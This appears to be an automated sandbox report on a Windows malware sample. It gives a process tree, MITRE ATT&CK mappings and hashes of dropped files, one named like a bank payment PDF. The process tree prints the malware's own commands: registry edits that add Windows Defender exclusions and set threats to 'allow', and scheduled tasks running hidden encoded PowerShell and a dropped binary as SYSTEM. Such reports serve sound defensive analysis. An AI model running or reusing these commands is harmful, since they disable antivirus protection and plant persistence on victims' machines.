  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DlbZONUGhjVU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DlbZONUGhjVU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GpfcWYRxKqUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GpfcWYRxKqUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KrPQunXfXpAVC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KrPQunXfXpAVC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oVhJPNkDU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oVhJPNkDU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nBRnpywzcTvqknVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nBRnpywzcTvqknVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:11056
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:12040
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:10964
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:11036
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:11964
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3280
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5540
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2264
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5872
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:10360
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:10808
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4732
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nBRnpywzcTvqknVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:9584
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nBRnpywzcTvqknVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8220
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6476
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5540
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:11716
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:12060
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wUBDPVxDQVpvNZiy /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:10360
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wUBDPVxDQVpvNZiy /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:10772
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gODIfvXcj" /SC once /ST 03:43:40 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:7072
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gODIfvXcj"
  2⤵
  PID:8240
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gODIfvXcj"
  2⤵
  PID:10808
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "GyWbuVQzPmDmgkCMH" /SC once /ST 05:11:19 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RZNlauV.exe\" KS /TNsite_idFYB 385118 /S" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:3516
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "GyWbuVQzPmDmgkCMH"
  2⤵
  PID:3880

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
1⤵
PID:9968

C:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exe
1⤵
PID:3600

C:\Users\Admin\AppData\Roaming\sceavri
C:\Users\Admin\AppData\Roaming\sceavri
1⤵
PID:7712

C:\ProgramData\presepuesto\LEAJ.exe
C:\ProgramData\presepuesto\LEAJ.exe
1⤵
PID:8244

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:9412

C:\Users\Admin\AppData\Roaming\jteavri
C:\Users\Admin\AppData\Roaming\jteavri
1⤵
PID:4772

C:\Users\Admin\AppData\Roaming\vgeavri
C:\Users\Admin\AppData\Roaming\vgeavri
1⤵
PID:4588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:9480

C:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exe
1⤵
PID:7532

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:6856

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
1⤵
PID:10924

C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
1⤵
PID:9896

C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
1⤵
PID:1420

C:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exe
1⤵
PID:11024

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:6628

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:11792

C:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exe
1⤵
PID:3924

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
1⤵
PID:11828

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\pmgpVSP.exe
C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\pmgpVSP.exe 3Y /IFsite_idNVs 385121 /S
1⤵
PID:2036
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:10028
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:12836

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\pmgpVSP.exe
C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\pmgpVSP.exe 3Y /IFsite_idNVs 385121 /S
1⤵
PID:12172

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:11924

C:\Windows\system32\WerFault.exe
"C:\Windows\system32\WerFault.exe" -k -lc PoW32kWatchdog PoW32kWatchdog-20231021-1134.dm
1⤵
PID:9148

C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RZNlauV.exe
C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RZNlauV.exe KS /TNsite_idFYB 385118 /S
1⤵
PID:11624
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bwpFiyeZPJPVdaMxTt"
  2⤵
  PID:13008
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
  2⤵
  PID:12620

C:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exe
1⤵
PID:12332

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
1⤵
PID:12324

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:12316

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:13028

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Scripting

T1064

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Network Service Discovery

T1046

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Are.docx

Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\ProgramData\JJJEBGDAFHJEBGDGIJDHCAKJKK

Filesize
20KB

MD5
c9ff7748d8fcef4cf84a5501e996a641

SHA1
02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

SHA256
4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

SHA512
d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\presepuesto\LEAJ.exe

Filesize
6.2MB

MD5
ab470dd42f581145478a79e4891b66ac

SHA1
23a1dc67cb9256403eb01ce469277969416878f5

SHA256
99326f7f1bbeba49536083cf460cc8ca004c1c0ef9e156b806be0c5c59f7ddd5

SHA512
27afd14aada2a12bf5f162da31ed2fcdc8e47492d82f99ea7610e231cd742eae5fa7514b1fba3d4fe1e3936f1c7613c3881f6e83d98d6e48b00433c328a41a14

Download Submit
C:\ProgramData\x64netJS\JQSZY.exe

Filesize
158.0MB

MD5
48d6f2580b9800ff5c2fa0014e58030e

SHA1
43855914850c4251676927a0c640ae4f76e17400

SHA256
7b0123362260b6516934e16448c5cec5252d9700f9c023b281ef8eaba9ab0101

SHA512
d926a31831b2a11c83adbda34c52942ef13d949583b46f3a1404c3ec735570a2409f777a98c83f665539a994db57a1c451a56398a6788899c5da486117d2cc0a

Download Submit
C:\Users\Admin\AppData\Local\8SWYmH1ilefiU1Z3VLypnfe8.exe

Filesize
4.2MB

MD5
6a5f0fb77fcc184799c102c72f6a8024

SHA1
c38321dd6cf0a118d41f9351a7e75ed9cdcbb02b

SHA256
d008f6e16f5f6215e997ac27941b6e3fa6086578eb6a700fed0b4664885eec51

SHA512
295d146ce9e8d147f715db0660921900f0da1ee43764e302649eef8a8af52a4c77dd60aba8fb50c196e04b6fa95aa57376e52935336250b9601a687a6585ec5f

Download Submit
C:\Users\Admin\AppData\Local\ARr6XyaQ9X1vBCnfaNQwnGWl.exe

Filesize
371KB

MD5
111e5fb51c341f850b1054ee2770c447

SHA1
e04a6384b3699353d0fdedcc1398cfa40e94157a

SHA256
c2627439f8a26cc87f936929e8a0a9755ac20de604efcce4c01413d0e508fc42

SHA512
7ba94fd6dbe319f8e2951da0fc911dd4d9d25397a063f92718fca226752a8079095eeaf83334785edb479902890a3624097df7d59a141ced954fb426e9bddc08

Download Submit
C:\Users\Admin\AppData\Local\E9HQPj2412wB7taNPZJoAAG4.exe

Filesize
5.2MB

MD5
df280925e135481b26e921dd1221e359

SHA1
877737c142fdcc03c33e20d4f17c48a741373c9e

SHA256
710a3e1beda67e1c543ba04423bfb0ba643815582310c0b3d03d03e071c894b8

SHA512
3da682a655a9df0ad0fcc6f28953f104383f3abe695afdd7a236d9ea0f05ef4de210da7c46139f3ce01e3e7dde9abf02b3665d1289e20426ba9164468807f487

Download Submit
C:\Users\Admin\AppData\Local\K8mk2Al243klZRbpOtLDNHKl.exe

Filesize
260KB

MD5
74d49caa0e8054010ca59c0684391a25

SHA1
1f9122ba5dd88b26017d125fb5384237dea985f5

SHA256
728a55ab40a62e82b72a191c56d10c804d4b2b2bd8217832c70d3696576a84e1

SHA512
e0d4d959eeb373242461e39c86f4c63611bc6c1b24a296c9982bf77831be1ff5c5953c606c46f023d5edb8fedf1aed2ef6a0942cb0ae0da54a69733afe95e799

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

Filesize
2KB

MD5
9af5a87a60049a82350be5c6bef795ca

SHA1
0e2b48d16c834af94b4510d480fea668bf91bf9f

SHA256
47912c6ac2f97589ce845050b9b14d4448a74e9a45ae75391741fc9fe9d55fd9

SHA512
fea833740d797be0bf3e80b74e8b3f9d85b4b479d264927bc1151354c77095719e36145f7cd69c848c871f97cfe6d5b3c45e4caea63b66364ccae601382d82ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Aviso%20de%20Pago_Banco%20BCP_Pdf.exe.log

Filesize
1KB

MD5
17f9a1dc9d4498be54494c3432c4c9f0

SHA1
d8728dfc3714f24b64d10ff708a3fb7ccb1a4393

SHA256
ee03182f7cc676469be25aecf9079745d67bf063ee4d210348bf7f1c281d8481

SHA512
e5334e0dc412e6ca792f39ccfdddc27b5cf3bbc54d4506c7075d2adf61ff5c68d7a24dff2ed74bb69a15c975178c156d37fde76bae296e0a17061306f4636c05

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\information.exe.log

Filesize
425B

MD5
605f809fab8c19729d39d075f7ffdb53

SHA1
c546f877c9bd53563174a90312a8337fdfc5fdd9

SHA256
6904d540649e76c55f99530b81be17e099184bb4cad415aa9b9b39cc3677f556

SHA512
82cc12c3186ae23884b8d5c104638c8206272c4389ade56b926dfc1d437b03888159b3c790b188b54d277a262e731927e703e680ea642e1417faee27443fd5b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\sogn.exe.log

Filesize
1KB

MD5
0c2899d7c6746f42d5bbe088c777f94c

SHA1
622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1

SHA256
5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458

SHA512
ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\SL9Z716W\nss3[1].dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\Local\Pd5wZ361Sx50jrkWwabeKJcO.exe

Filesize
316KB

MD5
51de33ffb264ed9871918a9176d5f5e9

SHA1
df0ce148a698b380a4d74b9c1f8fc7a9dd70a864

SHA256
6fb4a249e65fd7e0ff24323604b9bbc34324db76ec4978dcd193e1b23a5ac554

SHA512
